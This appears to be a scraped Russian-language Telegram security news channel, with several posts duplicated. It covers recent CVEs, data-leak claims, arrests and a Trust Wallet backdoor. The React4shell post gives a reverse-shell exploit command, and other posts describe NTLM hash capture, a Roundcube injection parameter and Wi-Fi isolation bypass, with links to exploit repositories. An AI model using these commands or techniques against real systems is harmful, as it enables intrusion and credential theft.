This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт за $200 000
Microsoft присвоила идентификатор CVE-2025-24054 зеродею, который за несколько сотен тысяч долларов продавал krypt0n на XSS.
krypt0n
Сам эксплойт — это .library-ms файл с адресом шары, на который проводник отправит NTLM-хэш, как файл появится на тачке.
poc // research
Раньше подобное можно было провернуть с
Microsoft присвоила идентификатор CVE-2025-24054 зеродею, который за несколько сотен тысяч долларов продавал krypt0n на XSS.
krypt0n
сейчас проясню все. Сервак в который летят хеши создается у себя. К примеру на впс. Дальше через эксплойт генерируешь конфиг с твоими ip, share и т.д после этого создается специальный конфиг. Кладешь его на шару в любое место, независит куда именно. И если пользователь просто откроет проводник или эту шару то автоматически произойдет редирект сам (идет редирект запроса) тем самым хеш пользователя прилетает к вам на сервер и все. Сам файл который лежит на шаре открывать НЕ нужно
Сам эксплойт — это .library-ms файл с адресом шары, на который проводник отправит NTLM-хэш, как файл появится на тачке.
poc // research
Раньше подобное можно было провернуть с
.ico и .ini. Все способы собраны в этой репе https://github.com/Gl3bGl4z/All_NTLM_leak, советую сохранить.2
This media is not supported in your browser
VIEW IN TELEGRAM
It's Over
Чуваки из Oligo Security нашли 17 уязвимостей в протоколе AirPlay от Apple.
Самая критичная CVE-2025-24132 позволяет получить шелл на другом устройстве мгновенно, без взаимодействия с пользователем. Надо только находиться в одной сети, и чтобы у цели был включен этот самый AirPlay, — на Mac он работает по умолчанию.
Сам протокол нужен, чтобы удаленно включать музыку/видео. Он есть не только у Mac, iPhone, Apple TV, — его используют миллионы умных устройств разных вендоров по всему миру, а еще — больше 800 марок автомобилей.
В X (ex. Twitter) уже многие называют это багом года.
PoC
Чуваки из Oligo Security нашли 17 уязвимостей в протоколе AirPlay от Apple.
Самая критичная CVE-2025-24132 позволяет получить шелл на другом устройстве мгновенно, без взаимодействия с пользователем. Надо только находиться в одной сети, и чтобы у цели был включен этот самый AirPlay, — на Mac он работает по умолчанию.
Сам протокол нужен, чтобы удаленно включать музыку/видео. Он есть не только у Mac, iPhone, Apple TV, — его используют миллионы умных устройств разных вендоров по всему миру, а еще — больше 800 марок автомобилей.
В X (ex. Twitter) уже многие называют это багом года.
PoC
На схеме пример, как можно сдампить токен админа без SQL-инъекции.
Уязвимость называется ORM Leak, и находят ее в последнее время все чаще и чаще, — вот, например, в Label Studio (система для разметки данных), и в двух крупных CMS — Payload CMS (CVE-2023-30843), и Strapi (CVE-2023-22894).
Возникает, когда разработчики хотят добавить гибкий поиск на сайте по разным полям. И чтобы не описывать каждое поле отдельно, делают фильтрацию динамической.
Тем самым допуская ошибку, благодаря которой в запросе можно прокинуть lookup expressions (пишутся через подчеркивания, и позволяют использовать разные фильтры). Дальше — выйти за пределы дефолтной таблички и, наконец, извлечь данные из БД, по аналогии с Boolean-based Blind.
Учитывая, что сейчас проще найти сервис, который использует не сырой SQL, а "безопасный ORM" — попадаться будет часто.
Подробнее можно почитать здесь Ransacking your password reset tokens, а тут посмотреть много примеров кода plORMbing your Django ORM.
Уязвимость называется ORM Leak, и находят ее в последнее время все чаще и чаще, — вот, например, в Label Studio (система для разметки данных), и в двух крупных CMS — Payload CMS (CVE-2023-30843), и Strapi (CVE-2023-22894).
Возникает, когда разработчики хотят добавить гибкий поиск на сайте по разным полям. И чтобы не описывать каждое поле отдельно, делают фильтрацию динамической.
Тем самым допуская ошибку, благодаря которой в запросе можно прокинуть lookup expressions (пишутся через подчеркивания, и позволяют использовать разные фильтры). Дальше — выйти за пределы дефолтной таблички и, наконец, извлечь данные из БД, по аналогии с Boolean-based Blind.
Учитывая, что сейчас проще найти сервис, который использует не сырой SQL, а "безопасный ORM" — попадаться будет часто.
Подробнее можно почитать здесь Ransacking your password reset tokens, а тут посмотреть много примеров кода plORMbing your Django ORM.
free money
С 5 по 7 июня пройдет CTF, где за призовые места дарят деньги.
Проводит Patchstack Alliance — группа в дискорде, участники которой ищет уязвимости в Wordpress и его плагинах, так что скорее всего задания будут как-то связаны с этой CMS.
За первое место дают $1000, а решить придется всего около 9 тасок.
Регистрация уже открыта https://ctf.patchstack.com/.
С 5 по 7 июня пройдет CTF, где за призовые места дарят деньги.
Проводит Patchstack Alliance — группа в дискорде, участники которой ищет уязвимости в Wordpress и его плагинах, так что скорее всего задания будут как-то связаны с этой CMS.
За первое место дают $1000, а решить придется всего около 9 тасок.
Регистрация уже открыта https://ctf.patchstack.com/.
Patchstack
CTF S02E03 - WordCamp Europe
Time for the real deal - WordCamp Europe CTF with a lot of prizes.
🔥 9.9 Critical
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
Пошагово, как работает эксплоит:
1. Подменяет
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
4. Во время вызова GPG-логики, Roundcube вызывает
5. Триггерится код из первого шага
exploit // nuclei // research
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
_from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения. ?_task=settings&_action=upload&_from=mail%2Finbox
Пошагово, как работает эксплоит:
1. Подменяет
_from сериализованным объектом.2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
rcube_pgp_engine → Crypt_GPG_Engine.4. Во время вызова GPG-логики, Roundcube вызывает
unserialize().5. Триггерится код из первого шага
exploit // nuclei // research
В Киеве арестовали админа российского даркнет-форума
В результате длительного расследования, проведенного французскими властями в сотрудничестве украинскими правоохранительными органами и Европолом, был арестован администратор xss.is, одной из самых влиятельных русскоязычных платформ киберпреступности в мире.
За 20 лет своей незаконной деятельности киберпреступник заработал более 7 млн. евро.
В результате длительного расследования, проведенного французскими властями в сотрудничестве украинскими правоохранительными органами и Европолом, был арестован администратор xss.is, одной из самых влиятельных русскоязычных платформ киберпреступности в мире.
За 20 лет своей незаконной деятельности киберпреступник заработал более 7 млн. евро.
Europol
Key figure behind major Russian-speaking cybercrime forum targeted in Ukraine – Suspected forum administrator with nearly 20 years…
Suspected forum administrator with nearly 20 years in cybercrime made over EUR 7 million facilitating illegal activities. A long-running investigation led by the French authorities, in close cooperation with their Ukrainian counterpart and Europol, has led…
6
Silent Crow вместе с Киберпартизаны BY скомпрометировали всю инфраструктуру "Аэрофлот — российские авиалинии".
Был получен доступ к 122 гипервизорам, 43 инсталляциям виртуализации ZVIRT, 4 кластерам Proxmox. Было уничтожено около 7000 серверов — физических и виртуальных.
Объем полученной информации составляет 12TB баз данных, 8TB файлов с Windows Share, 2TB корпоративной почты.
На протяжении года мы находились внутри их корпоративной сети, методично развивая доступ, углубляясь до самого ядра инфраструктуры — Tier0.
Были скомпрометированы все критические корпоративные системы. А также получен контроль над всеми персональными компьютерами сотрудников, включая высшее руководство.
Был получен доступ к 122 гипервизорам, 43 инсталляциям виртуализации ZVIRT, 4 кластерам Proxmox. Было уничтожено около 7000 серверов — физических и виртуальных.
Объем полученной информации составляет 12TB баз данных, 8TB файлов с Windows Share, 2TB корпоративной почты.
Наша операция — это прямое послание:
Для ФСБ, НКЦКИ, RT-Solar и других так называемых "киберзащитников" — вы не способны защитить даже свои ключевые инфраструктуры. Для всех сотрудников репрессивного аппарата — ваша цифровая безопасность ничтожна, и вы сами уже давно под наблюдением.
Hello, у меня есть полный дамп max[.]ru, там ровно 46203590 строк, и у меня все еще есть VPN-доступ к их salesforce и другим внутренним инструментам.
Titusko25357 с DarkForums заявил о том, что он хакнул "самый безопасный мессенджер" и готов продать базу всех бедолаг, общий объем которой насчитывает более 45кк строк.Цену не сообщил, но в треде и во всех новостных каналах уже начали это активно обсуждать, вот некоторые комментарии:
Hello, i'm from Russia, mb I'm in this databaseXD. U legend dawg.
вот тут верю, вот тут плюс, верю, уже верю. Да, поверил. Да, я поверил, да, а шо? Да, да я, да, поверил, да, я, а шо?
Кто бы чё не пиздел но некоторые номера довольно таки валидные :))
Думайте. Поздняков. Подписаться
neokoder справедливо заметил, что Salesforce ушел еще в 2022 годуall the big companies in russia ditched salesforce back in 2022 when the first wave of sanctions hit. salesforce completely stopped doing business there
А еще несколько юзеров отписали, что данные не бьются с настоящими
Кому интересно, можете себе макс скачать, на рандом симку врегать.
Там по номеру мобильного можно перейти на чела (кнопка найти по номеру), ни один из номеров не бьется, с текстом по типу: «Еще не зарегистрирован в Max, пригласите его».
lmao
'Ольга', 'Новикова', '+79265478963', = Мингбоев Мухамадали
'Катерина', 'Бойко', '+79502804153', = Перова Евгения
nice fake db leak lol
Скорее всего, данные — ИИ слоп, а тема создана для скама или просто троллинга. Можно было бы засомневаться и поверить в обратное, если бы не нулевая репа топик стартера, сомнительный сэмпл и косяк с Salesforce.
1
This media is not supported in your browser
VIEW IN TELEGRAM
В Тайланде местная киберполиция вместе с FBI задержали российского офицера ГРУ Алексея Лукашева, одного из участников группы Fancy Bear, которого обвиняют во вмешательстве в американские выборы.
Страница розыска на сайте ФБР https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev.
Чем он занимался:
— в 2014 и 2015 годах участвовал во взломе Бундестага
— в 2016 организовывал фишинговые атаки против сотрудников штаба Хиллари Клинтон (например, рассылал поддельные уведомления Google о смене пароля)
— действовал как офицер-координатор, распределяя задачи между остальными хакерами, управлял C2-сервером X-Agent
— под его руководством было слито больше 50 000 конфиденциальных документов на сайт dcleaks.com
И это только то, что удалось явно доказать. Более подробно можно почитать в самом обвинении Минюста, и в Muller Report, отчете бывшего директора ФБР Роберта Мюллера.
UPD.: CNN пишет, что хакера зовут Денис Обрезко, по их словам, это сотрудник ФСБ и участник группы Laundry Bear (Void Blizzard).
Страница розыска на сайте ФБР https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev.
Чем он занимался:
— в 2014 и 2015 годах участвовал во взломе Бундестага
— в 2016 организовывал фишинговые атаки против сотрудников штаба Хиллари Клинтон (например, рассылал поддельные уведомления Google о смене пароля)
— действовал как офицер-координатор, распределяя задачи между остальными хакерами, управлял C2-сервером X-Agent
— под его руководством было слито больше 50 000 конфиденциальных документов на сайт dcleaks.com
И это только то, что удалось явно доказать. Более подробно можно почитать в самом обвинении Минюста, и в Muller Report, отчете бывшего директора ФБР Роберта Мюллера.
UPD.: CNN пишет, что хакера зовут Денис Обрезко, по их словам, это сотрудник ФСБ и участник группы Laundry Bear (Void Blizzard).
Одна строчка кода на Rust сломала весь интернет
Cloudflare выпустили разбор вчерашнего инцидента. Выяснилось, что у них лег сервис Bot Management, который используют для защиты от DDoS.
Архитектура этого сервиса устроена так, есть
1. Clickhouse, где Cloudflare хранит список правил для защиты от ботов
2. Cron-скрипт, который вычитывает БД, и генерирует список правил для раскатки на серверы
3. Скрипт на Rust, на самих серверах, который берет правила и применяет их
На первом этапе инженеры внесли изменение в Clickhouse, в результате которых на втором шаге создался список правил в 2 раза больше, чем обычно.
На этапе 3 скрипт понял, что файл превышает лимиты размера, и споткнулся об
Сначала в Cloudflare думали, что это атака нового ботнета Aisuru, который недавно поставил рекорд мощностью 15 Tbps. Но в результате ошибки инженеров самой компании полегло куча сервисов, включая X/Twitter, ChatGPT, Spotify, Canva, и McDonald's.
Cloudflare выпустили разбор вчерашнего инцидента. Выяснилось, что у них лег сервис Bot Management, который используют для защиты от DDoS.
Архитектура этого сервиса устроена так, есть
1. Clickhouse, где Cloudflare хранит список правил для защиты от ботов
2. Cron-скрипт, который вычитывает БД, и генерирует список правил для раскатки на серверы
3. Скрипт на Rust, на самих серверах, который берет правила и применяет их
На первом этапе инженеры внесли изменение в Clickhouse, в результате которых на втором шаге создался список правил в 2 раза больше, чем обычно.
На этапе 3 скрипт понял, что файл превышает лимиты размера, и споткнулся об
.unwrap(), который отправил его в panic и аварийно завершил работу (вместо того, чтобы проигнорировать "плохой" список) на всех инстансах по всему миру.Сначала в Cloudflare думали, что это атака нового ботнета Aisuru, который недавно поставил рекорд мощностью 15 Tbps. Но в результате ошибки инженеров самой компании полегло куча сервисов, включая X/Twitter, ChatGPT, Spotify, Canva, и McDonald's.
Ваши фото счетчиков под угрозой
Плохие новости от GrapheneOS — создатели приватной прошивки пишут о том, что французские силовики проплатили медиа, чтобы дискредитировать проект.
Причина в том, что даже софт от Cellebrite не может справиться с "операционкой", поэтому местные полицейские начали давить на GrapheneOS с просьбой внедрить бэкдор, под предлогом борьбы с наркотиками.
Создатели проекта, конечно, отказали, и теперь вынуждены поспешно мигрировать всю инфраструктуру (сервера обновлений, главный сайт, форум) с французского хостинга OVHcloud в США, Англию, и Канаду.
Кстати, именно французские власти начали изначально пушить инициативу "EU Chat Control" в ЕС со сканированием личных сообщений. Более того, за отказ разблокировать смартфон во Франции можно получить уголовку, от 3-х до 5-ти лет.
Плохие новости от GrapheneOS — создатели приватной прошивки пишут о том, что французские силовики проплатили медиа, чтобы дискредитировать проект.
Причина в том, что даже софт от Cellebrite не может справиться с "операционкой", поэтому местные полицейские начали давить на GrapheneOS с просьбой внедрить бэкдор, под предлогом борьбы с наркотиками.
Создатели проекта, конечно, отказали, и теперь вынуждены поспешно мигрировать всю инфраструктуру (сервера обновлений, главный сайт, форум) с французского хостинга OVHcloud в США, Англию, и Канаду.
Кстати, именно французские власти начали изначально пушить инициативу "EU Chat Control" в ЕС со сканированием личных сообщений. Более того, за отказ разблокировать смартфон во Франции можно получить уголовку, от 3-х до 5-ти лет.
Когда подключаешься к WiFi где-нибудь в коворкинге и пытаешься просканить хосты, можно ничего не найти из-за их изоляции. Pulse Security рассказали о том, как ее можно обойти.
Дело в том, что изоляция работает на уровне роутера, запрос идет так: твой ПК => роутер => ПК другого клиента. В этой схеме роутер отбрасывает все, что ты пытаешься отправить кому-то в сети во время сканирования.
Но радиоволна не знает про изоляцию. Кадр, который отправляешь в эфир, физически доходит до всех. Чтобы обойти изоляцию, достаточно создать 802.11 кадр с флагом From-DS-1 (прикинувшись роутером) и отправить его напрямую клиенту, а затем прослушать эфир на наличие ответа.
Это касается незашифрованных сетей. Но способ будет работать и для WPA2-CCMP-PSK, который используется повсеместно. Достаточно провести DeAuth, перехватить хэндшейк, вычислить Temporal Key (ключ шифрования), и установить соединение с клиентом, а дальше по описанной схеме.
PoC уже выложили на GitHub, а в самой статье показали рабочий пример скана с nmap и подключение к VNC на другой тачке.
Дело в том, что изоляция работает на уровне роутера, запрос идет так: твой ПК => роутер => ПК другого клиента. В этой схеме роутер отбрасывает все, что ты пытаешься отправить кому-то в сети во время сканирования.
Но радиоволна не знает про изоляцию. Кадр, который отправляешь в эфир, физически доходит до всех. Чтобы обойти изоляцию, достаточно создать 802.11 кадр с флагом From-DS-1 (прикинувшись роутером) и отправить его напрямую клиенту, а затем прослушать эфир на наличие ответа.
Это касается незашифрованных сетей. Но способ будет работать и для WPA2-CCMP-PSK, который используется повсеместно. Достаточно провести DeAuth, перехватить хэндшейк, вычислить Temporal Key (ключ шифрования), и установить соединение с клиентом, а дальше по описанной схеме.
PoC уже выложили на GitHub, а в самой статье показали рабочий пример скана с nmap и подключение к VNC на другой тачке.
GitHub
GitHub - Pulse-Security/wifi-client-isolation-bypass: Bypass WiFi client isolation on Open and WPA2-PSK networks
Bypass WiFi client isolation on Open and WPA2-PSK networks - Pulse-Security/wifi-client-isolation-bypass
🔥 10/10 React4shell
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku.
Just when I thought the day was over… CVE-2025-55182 shows up 🫠
Сам баг находится в RSC-рантайме, который принимает данные и небезопасно десериализует их. Запатчиться сейчас почти никто не успел, а уязвимость можно считать одной из самых критичных, которые находили в React за все время.
react.dev
Critical Security Vulnerability in React Server Components – React
The library for web and native user interfaces
Cybred
🔥 10/10 React4shell В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku. Just when I thought the…
Рабочий эксплоит
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
11
n8n RCE CVE-2025-68613
Любой пользователь может исполнять код на сервере, достаточно создать воркфлоу как на скрине.
Уязвимы версии:
— от 0.211.0 до 1.120.3
— 1.121.0
Эксплойт: https://github.com/wioui/n8n-CVE-2025-68613-exploit
Любой пользователь может исполнять код на сервере, достаточно создать воркфлоу как на скрине.
Уязвимы версии:
— от 0.211.0 до 1.120.3
— 1.121.0
Эксплойт: https://github.com/wioui/n8n-CVE-2025-68613-exploit
2
Тайна Эпштейна раскрыта
Недавно опубликовали файлы по делу Эпштейна, и это сразу же стало мемом, поскольку их настолько сильно зацензурили, что многие страницы невозможно прочитать.
Но пользователь с реддита обнаружил, что цензуру можно обойти. Дело в том, что редактор скрывает текст наложением на него черного прямоугольника. И такие программы, как Adobe Acrobat удаляют все, что находится под ним, а другие — нет.
Так и случилось в этот раз — у опубликованных PDF-файлов оказалось два слоя, и тот, что скрывает текст под собой, можно запросто убрать и прочитать все содержимое.
Конечно, это можно сделать не со всеми файлами. Но проблема встречается довольно часто. Так, в 2014 году The New Times опубликовал документ, в которых случайно раскрыли имя агента спецслужб. Проблема стала настолько серьезной, что NSA даже написали собственный гайдлайн для сотрудников.
Но главное — на Github релизнули утилиту, которая может быть полезна для показа скрытого текста https://github.com/leedrake5/unredact
Недавно опубликовали файлы по делу Эпштейна, и это сразу же стало мемом, поскольку их настолько сильно зацензурили, что многие страницы невозможно прочитать.
Но пользователь с реддита обнаружил, что цензуру можно обойти. Дело в том, что редактор скрывает текст наложением на него черного прямоугольника. И такие программы, как Adobe Acrobat удаляют все, что находится под ним, а другие — нет.
Так и случилось в этот раз — у опубликованных PDF-файлов оказалось два слоя, и тот, что скрывает текст под собой, можно запросто убрать и прочитать все содержимое.
Конечно, это можно сделать не со всеми файлами. Но проблема встречается довольно часто. Так, в 2014 году The New Times опубликовал документ, в которых случайно раскрыли имя агента спецслужб. Проблема стала настолько серьезной, что NSA даже написали собственный гайдлайн для сотрудников.
Но главное — на Github релизнули утилиту, которая может быть полезна для показа скрытого текста https://github.com/leedrake5/unredact
7 миллионов долларов за 1 день
Украл хакер с помощью бэкдора в Trust Wallet. В официальном расширении он изменил домен PostHog (сервис для аналитики) на собственный и добавил сбор мнемонических фраз пользователей.
На подготовку ушло две недели (8-22 декабря), а 25 декабря он уже начал переводить деньги с украденных кошельков
Одна из пострадавших уже поделилась, как это произошло
Версия с бэкдором —
UPD: ZachXBT сообщил, что сообщение оставил скамер
Украл хакер с помощью бэкдора в Trust Wallet. В официальном расширении он изменил домен PostHog (сервис для аналитики) на собственный и добавил сбор мнемонических фраз пользователей.
На подготовку ушло две недели (8-22 декабря), а 25 декабря он уже начал переводить деньги с украденных кошельков
Одна из пострадавших уже поделилась, как это произошло
Я возвращалась с Рождества, проведённого с семьёй. С волнением собиралась проверить рынки — вдруг удастся поймать какие-то возможности на этой годовой просадке.
Вместо этого я открыла кошелёк и увидела, что +$300 000 просто исчезли.
Браузерное расширение Trust Wallet оказалось скомпрометированным.
Всё, что я строила. Украдено в Рождество.
...
Я в крипте с 2018 года. Я знаю риски. Для долгосрочных активов я использую аппаратные кошельки. Я никогда не подключаюсь к подозрительным dApp’ам. Я дотошно проверяю и регулярно аудитю все разрешения.
Я сделала всё «правильно».
И всё равно — скомпрометированное расширение опустошило мой торговый аккаунт всего за 4 минуты.
Версия с бэкдором —
2.68, будьте осторожны.UPD: ZachXBT сообщил, что сообщение оставил скамер